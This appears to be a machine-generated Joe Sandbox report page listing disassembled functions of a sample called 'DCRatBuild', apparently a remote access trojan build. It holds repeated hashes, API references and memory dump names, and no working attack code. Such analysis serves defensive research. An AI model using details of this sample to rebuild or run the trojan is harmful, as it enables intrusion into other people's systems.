Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5d10d15ba3f85ce6492e2468f907143f288af14b9db79c4886f78fd5d3616d74
Instruction ID: ed0b7d01d0ddc0ceed7a73bbfcd15236c6fe4fe507712e7edc6647fb71efc084
Opcode Fuzzy Hash: 5d10d15ba3f85ce6492e2468f907143f288af14b9db79c4886f78fd5d3616d74
Instruction Fuzzy Hash: 55A001E66AD697BC7108A256AD66D3A421CE8C6B69730892AB44AE41C1A9806C4D5832

Function 008ED96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e0ed7d8f1dcec9770b8c935678554eef5743264fc3fdf2e1ecd70947f6e95e86
Instruction ID: ed0b7d01d0ddc0ceed7a73bbfcd15236c6fe4fe507712e7edc6647fb71efc084
Opcode Fuzzy Hash: e0ed7d8f1dcec9770b8c935678554eef5743264fc3fdf2e1ecd70947f6e95e86
Instruction Fuzzy Hash: 55A001E66AD697BC7108A256AD66D3A421CE8C6B69730892AB44AE41C1A9806C4D5832

Function 008ED965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 92cd79dafdb1d29a406aaf75d9463d5aab8be01c5e9e642b71b835cafa31800b
Instruction ID: ed0b7d01d0ddc0ceed7a73bbfcd15236c6fe4fe507712e7edc6647fb71efc084
Opcode Fuzzy Hash: 92cd79dafdb1d29a406aaf75d9463d5aab8be01c5e9e642b71b835cafa31800b
Instruction Fuzzy Hash: 55A001E66AD697BC7108A256AD66D3A421CE8C6B69730892AB44AE41C1A9806C4D5832

Function 008ED979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 03a17c551dc40b7efb1dc24c43b2750f8c056e143a4d59973566fc42a7c9411e
Instruction ID: ed0b7d01d0ddc0ceed7a73bbfcd15236c6fe4fe507712e7edc6647fb71efc084
Opcode Fuzzy Hash: 03a17c551dc40b7efb1dc24c43b2750f8c056e143a4d59973566fc42a7c9411e
Instruction Fuzzy Hash: 55A001E66AD697BC7108A256AD66D3A421CE8C6B69730892AB44AE41C1A9806C4D5832

Function 008EDAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008EDAB2

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 14b6aa1b4f29e218c02fb533bdef6c56bb879820a28843fb3c56e554d718fc94
Instruction ID: c8702a40c6723faa27ef51bc1aa5091dec937d8e7af0906b994204040897a474
Opcode Fuzzy Hash: 14b6aa1b4f29e218c02fb533bdef6c56bb879820a28843fb3c56e554d718fc94
Instruction Fuzzy Hash: A1A011E22AC282BC3008B203AC02C3A020CE0C2B2A330822AF00AE00C8A8808C0C0832

Function 008EDACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008EDAB2

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 71064167ca3a2d418197b6681e2060e6fc4e3961e62a9570372cffba57e4065f
Instruction ID: 4111161169764c2b711601b15ca92be2b3eb061f8449e743ca69dc4bb60d2430
Opcode Fuzzy Hash: 71064167ca3a2d418197b6681e2060e6fc4e3961e62a9570372cffba57e4065f
Instruction Fuzzy Hash: 45A011E22AC282BC3008B203AC02C3A020CE0C2BA83308A2AF00AC00C8A8808C0C0832

Function 008EDAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008EDAB2

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3484c96872875247f592db10aa4d1c79fad1abb93bd456ba26f991eb52d439ee
Instruction ID: 4111161169764c2b711601b15ca92be2b3eb061f8449e743ca69dc4bb60d2430
Opcode Fuzzy Hash: 3484c96872875247f592db10aa4d1c79fad1abb93bd456ba26f991eb52d439ee
Instruction Fuzzy Hash: 45A011E22AC282BC3008B203AC02C3A020CE0C2BA83308A2AF00AC00C8A8808C0C0832

Function 008EDAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008EDAB2

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 63fee5e7b90736dd38fb66a7f68f47928a2cac4db44b5c63342cfb79321a8324
Instruction ID: 4111161169764c2b711601b15ca92be2b3eb061f8449e743ca69dc4bb60d2430
Opcode Fuzzy Hash: 63fee5e7b90736dd38fb66a7f68f47928a2cac4db44b5c63342cfb79321a8324
Instruction Fuzzy Hash: 45A011E22AC282BC3008B203AC02C3A020CE0C2BA83308A2AF00AC00C8A8808C0C0832

Function 008EDAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008EDAB2

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9992605887685d3ebaed1ed95d5ffedd630525573d2bb6d3c50d90747f3b29d3
Instruction ID: 4111161169764c2b711601b15ca92be2b3eb061f8449e743ca69dc4bb60d2430
Opcode Fuzzy Hash: 9992605887685d3ebaed1ed95d5ffedd630525573d2bb6d3c50d90747f3b29d3
Instruction Fuzzy Hash: 45A011E22AC282BC3008B203AC02C3A020CE0C2BA83308A2AF00AC00C8A8808C0C0832

Function 008EDAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008EDAB2

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a03ecaacaff24429f45a5d793c0b2e5b02dcd6da2a742fbbb0064cb8c24cf824
Instruction ID: 4111161169764c2b711601b15ca92be2b3eb061f8449e743ca69dc4bb60d2430
Opcode Fuzzy Hash: a03ecaacaff24429f45a5d793c0b2e5b02dcd6da2a742fbbb0064cb8c24cf824
Instruction Fuzzy Hash: 45A011E22AC282BC3008B203AC02C3A020CE0C2BA83308A2AF00AC00C8A8808C0C0832

Function 008EDBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008EDBD5

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bc828d09cecc36c97cefc2b8e3263cf48d36e4deaa736fd72104054dda2f25ec
Instruction ID: 4562eafccd0a9fab563fbdf9f669ee13b472d0fe884c0bb8ab1426627a6d5778
Opcode Fuzzy Hash: bc828d09cecc36c97cefc2b8e3263cf48d36e4deaa736fd72104054dda2f25ec
Instruction Fuzzy Hash: 8EA0029527D2467C710851566D17D76021CE4C5B653315919B50AD41C16E505C4D5471

Function 008EDC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008EDBD5

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5dd79bb65b9e879655c2fd485936d52917669bf5dc367c4845d6808cb1d6a0fc
Instruction ID: 4562eafccd0a9fab563fbdf9f669ee13b472d0fe884c0bb8ab1426627a6d5778
Opcode Fuzzy Hash: 5dd79bb65b9e879655c2fd485936d52917669bf5dc367c4845d6808cb1d6a0fc
Instruction Fuzzy Hash: 8EA0029527D2467C710851566D17D76021CE4C5B653315919B50AD41C16E505C4D5471

Function 008EDC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008EDBD5

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ebfafd9586e000d981c823a0f9b594d0e0ddb1d5a7a0edbec5a1f9477d404e07
Instruction ID: 4562eafccd0a9fab563fbdf9f669ee13b472d0fe884c0bb8ab1426627a6d5778
Opcode Fuzzy Hash: ebfafd9586e000d981c823a0f9b594d0e0ddb1d5a7a0edbec5a1f9477d404e07
Instruction Fuzzy Hash: 8EA0029527D2467C710851566D17D76021CE4C5B653315919B50AD41C16E505C4D5471

Function 008EDC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008EDBD5

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e620d1957a75fd97d4a4af3b1f6657bdc556450a4e67c6f6299fb77a53e63a21
Instruction ID: 4562eafccd0a9fab563fbdf9f669ee13b472d0fe884c0bb8ab1426627a6d5778
Opcode Fuzzy Hash: e620d1957a75fd97d4a4af3b1f6657bdc556450a4e67c6f6299fb77a53e63a21
Instruction Fuzzy Hash: 8EA0029527D2467C710851566D17D76021CE4C5B653315919B50AD41C16E505C4D5471

Function 008EDC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008EDC36

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 366cec5da351ef87480704b067ede846adcd73c3b0f833af1c59b77b968a11e2
Instruction ID: 18f4bb1d4ca5281bbbb39499cf4b9974a79bb69d16d680cf6be4999e6bd2e6f0
Opcode Fuzzy Hash: 366cec5da351ef87480704b067ede846adcd73c3b0f833af1c59b77b968a11e2
Instruction Fuzzy Hash: E0A0029556D746BC710C61566D16D7A021CD5C5F953304919B506D41D159805C4D5471

Function 008EDC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008EDC36

Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 07d34378e4314cd046da9dfe6078b29eb51f52adc67a0708436a683b2e1d80ca
Instruction ID: 18f4bb1d4ca5281bbbb39499cf4b9974a79bb69d16d680cf6be4999e6bd2e6f0
Opcode Fuzzy Hash: 07d34378e4314cd046da9dfe6078b29eb51f52adc67a0708436a683b2e1d80ca
Instruction Fuzzy Hash: E0A0029556D746BC710C61566D16D7A021CD5C5F953304919B506D41D159805C4D5471

Function 008D9EBF Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,008D9104,?,?,-00001964), ref: 008D9EC2

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 7bd3d95b012104f6c13b37da22cbdfd21514261a0c6616057f20c3abfa9c6062
Instruction ID: 9740190c54aa35656106ecd73976e1748d6889435299af665dd8d7d5ffc4256c
Opcode Fuzzy Hash: 7bd3d95b012104f6c13b37da22cbdfd21514261a0c6616057f20c3abfa9c6062
Instruction Fuzzy Hash: C4B011300BA00A8ACE002F30CC088283A28EA2230A30082A0A002CA0A0CB22C002AA00

Function 008EA322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,008EA587,C:\Users\user\AppData\Local\Temp\RarSFX0,00000000,0091946A,00000006), ref: 008EA326

Memory Dump Source

